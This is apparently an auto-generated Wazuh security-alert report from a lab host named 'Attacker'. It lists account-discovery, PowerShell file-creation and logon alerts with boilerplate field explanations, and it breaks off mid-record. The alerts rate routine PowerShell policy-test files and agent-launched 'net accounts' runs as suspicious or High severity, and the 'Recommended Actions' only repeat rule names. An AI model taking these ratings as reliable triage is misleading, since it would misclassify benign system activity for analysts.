🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:00.305+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534520.2221166
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:58.1535209Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288481
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:41:58.147 ProcessGuid: {94294ddc-be36-680a-0e0c-000000000e00} ProcessId: 13260 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00} ParentProcessId: 9516 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:58.147
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0e0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13260
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be36-680a-0c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:42:01.284+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:01.284+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534521.2226221
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:58.9659338Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288487
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:41:58.965 ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00} ProcessId: 10392 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_4x1dyjil.bnk.ps1 CreationUtcTime: 2025-04-24 22:41:58.962 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:41:58.965
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10392
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_4x1dyjil.bnk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:41:58.962
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell process created an executable file in Windows root folder

🧠 What happened? Powershell process created an executable file in Windows root folder

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:42:06.660+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:06.660+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell process created an executable file in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92205
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534526.2228926
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:04.2531417Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288648
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:42:04.251 ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00} ProcessId: 10392 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1 CreationUtcTime: 2025-04-24 22:42:04.251 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:04.251
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10392
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:42:04.251
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:10.040+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:10.040+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  62
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534530.2231631
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:06.6692041Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43899
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Length of the session key generated for the logon (e.g., 128‑bit). 0 means no session key was requested; an unexpectedly short key can point to a downgrade.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:31.811+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:31.811+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534551.2238966
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:29.2811340Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  289977
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:29.257 ProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00} ProcessId: 664 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:29.257
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be55-680a-1a0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
